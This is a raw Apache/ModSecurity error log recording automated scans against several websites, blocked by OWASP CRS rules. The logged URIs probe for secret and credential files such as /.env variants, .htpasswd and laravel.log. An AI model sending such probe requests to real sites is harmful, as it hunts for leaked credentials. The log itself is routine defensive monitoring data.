[Mon May 11 12:15:05.344354 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.213.174.51:41268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agGsKUYQeUtAPynIs6xhHQAAAAk"]
[Mon May 11 12:15:05.344534 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.213.174.51:41160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agGsKb4KNmD_mZ_vlf9BVAAAAEM"]
[Mon May 11 12:15:05.344602 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.213.174.51:41120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agGsKUYQeUtAPynIs6xhHgAAABU"]
[Mon May 11 12:15:05.352660 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.213.174.51:41168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agGsKURdw2n9wv6Ai48P5wAAAIA"]
[Mon May 11 12:15:05.353358 2026] [security2:error] [pid 1256241:tid 1256268] [client 185.213.174.51:41142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agGsKZkIEwRJMyDaV55WrQAAAVY"]
[Mon May 11 12:15:05.353695 2026] [security2:error] [pid 1256241:tid 1256268] [client 185.213.174.51:41142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agGsKZkIEwRJMyDaV55WrQAAAVY"]
[Mon May 11 12:15:05.354531 2026] [security2:error] [pid 1256241:tid 1256268] [client 185.213.174.51:41142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agGsKZkIEwRJMyDaV55WrQAAAVY"]
[Mon May 11 12:15:20.426978 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:6950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /railway/.env.dist.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/railway/.env.dist.orig"] [unique_id "agGsOL4KNmD_mZ_vlf9BbQAAAFI"]
[Mon May 11 12:15:20.428136 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:6950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/railway/.env.dist.orig"] [unique_id "agGsOL4KNmD_mZ_vlf9BbQAAAFI"]
[Mon May 11 12:15:22.432888 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:6950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsOL4KNmD_mZ_vlf9BbQAAAFI"]
[Mon May 11 12:15:22.461980 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:6962] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /railway/.env.dist.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/railway/.env.dist.orig"] [unique_id "agGsOmS6k_SCYd1AVZq3UQAAAQs"]
[Mon May 11 12:15:22.462347 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:6962] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/railway/.env.dist.orig"] [unique_id "agGsOmS6k_SCYd1AVZq3UQAAAQs"]
[Mon May 11 12:15:23.018647 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/plugins/wordpress-seo/src/commands/error_log
[Mon May 11 12:15:24.412760 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:6962] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsOmS6k_SCYd1AVZq3UQAAAQs"]
[Mon May 11 12:15:24.439846 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:2112] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /railway/.htpasswd.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/railway/.htpasswd.tmp"] [unique_id "agGsPGS6k_SCYd1AVZq3UgAAAQY"]
[Mon May 11 12:15:24.440195 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:2112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/railway/.htpasswd.tmp"] [unique_id "agGsPGS6k_SCYd1AVZq3UgAAAQY"]
[Mon May 11 12:15:24.979197 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/plugins/wordpress-seo/src/commands/error_log
[Mon May 11 12:15:25.770526 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:2112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsPGS6k_SCYd1AVZq3UgAAAQY"]
[Mon May 11 12:15:25.799331 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:2116] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /railway/.htpasswd.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/railway/.htpasswd.tmp"] [unique_id "agGsPURdw2n9wv6Ai48QFQAAAIU"]
[Mon May 11 12:15:25.799630 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:2116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/railway/.htpasswd.tmp"] [unique_id "agGsPURdw2n9wv6Ai48QFQAAAIU"]
[Mon May 11 12:15:26.742964 2026] [security2:error] [pid 1254133:tid 1254145] [client 85.121.126.209:55872] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.development"] [unique_id "agGsPhjZymfuKpjWXeiFaAAAAMk"]
[Mon May 11 12:15:26.743115 2026] [security2:error] [pid 1254133:tid 1254143] [client 85.121.126.209:55976] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/public/.env"] [unique_id "agGsPhjZymfuKpjWXeiFZwAAAMc"]
[Mon May 11 12:15:26.743288 2026] [security2:error] [pid 1254133:tid 1254143] [client 85.121.126.209:55976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/public/.env"] [unique_id "agGsPhjZymfuKpjWXeiFZwAAAMc"]
[Mon May 11 12:15:26.743494 2026] [security2:error] [pid 1254328:tid 1254349] [client 85.121.126.209:55930] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/api/.env"] [unique_id "agGsPkRdw2n9wv6Ai48QFgAAAJM"]
[Mon May 11 12:15:26.743898 2026] [security2:error] [pid 1254328:tid 1254349] [client 85.121.126.209:55930] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/api/.env"] [unique_id "agGsPkRdw2n9wv6Ai48QFgAAAJM"]
[Mon May 11 12:15:26.745057 2026] [security2:error] [pid 1254133:tid 1254145] [client 85.121.126.209:55872] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.development"] [unique_id "agGsPhjZymfuKpjWXeiFaAAAAMk"]
[Mon May 11 12:15:26.745185 2026] [security2:error] [pid 1254212:tid 1254226] [client 85.121.126.209:55862] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.production"] [unique_id "agGsPkYQeUtAPynIs6xhPQAAAAw"]
[Mon May 11 12:15:26.745607 2026] [security2:error] [pid 1254212:tid 1254226] [client 85.121.126.209:55862] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.production"] [unique_id "agGsPkYQeUtAPynIs6xhPQAAAAw"]
[Mon May 11 12:15:26.746293 2026] [security2:error] [pid 1256241:tid 1256268] [client 85.121.126.209:55898] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.old"] [unique_id "agGsPpkIEwRJMyDaV55W0AAAAVY"]
[Mon May 11 12:15:26.747647 2026] [security2:error] [pid 1256241:tid 1256268] [client 85.121.126.209:55898] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.old"] [unique_id "agGsPpkIEwRJMyDaV55W0AAAAVY"]
[Mon May 11 12:15:26.747682 2026] [security2:error] [pid 1254328:tid 1254352] [client 85.121.126.209:55918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.test"] [unique_id "agGsPkRdw2n9wv6Ai48QGQAAAJc"]
[Mon May 11 12:15:26.749656 2026] [security2:error] [pid 1254328:tid 1254352] [client 85.121.126.209:55918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.test"] [unique_id "agGsPkRdw2n9wv6Ai48QGQAAAJc"]
[Mon May 11 12:15:26.749658 2026] [security2:error] [pid 1254133:tid 1254138] [client 85.121.126.209:55866] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.local"] [unique_id "agGsPhjZymfuKpjWXeiFagAAAMI"]
[Mon May 11 12:15:26.750105 2026] [security2:error] [pid 1254133:tid 1254138] [client 85.121.126.209:55866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.local"] [unique_id "agGsPhjZymfuKpjWXeiFagAAAMI"]
[Mon May 11 12:15:26.751882 2026] [security2:error] [pid 1254133:tid 1254146] [client 85.121.126.209:55946] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/admin/.env"] [unique_id "agGsPhjZymfuKpjWXeiFawAAAMo"]
[Mon May 11 12:15:26.752048 2026] [security2:error] [pid 1254133:tid 1254146] [client 85.121.126.209:55946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/admin/.env"] [unique_id "agGsPhjZymfuKpjWXeiFawAAAMo"]
[Mon May 11 12:15:26.752302 2026] [security2:error] [pid 1254133:tid 1254158] [client 85.121.126.209:55958] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/backend/.env"] [unique_id "agGsPhjZymfuKpjWXeiFaQAAANY"]
[Mon May 11 12:15:26.753090 2026] [security2:error] [pid 1254328:tid 1254335] [client 85.121.126.209:55882] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.backup"] [unique_id "agGsPkRdw2n9wv6Ai48QGgAAAIQ"]
[Mon May 11 12:15:26.754041 2026] [security2:error] [pid 1254328:tid 1254335] [client 85.121.126.209:55882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.backup"] [unique_id "agGsPkRdw2n9wv6Ai48QGgAAAIQ"]
[Mon May 11 12:15:26.755857 2026] [security2:error] [pid 1254133:tid 1254158] [client 85.121.126.209:55958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/backend/.env"] [unique_id "agGsPhjZymfuKpjWXeiFaQAAANY"]
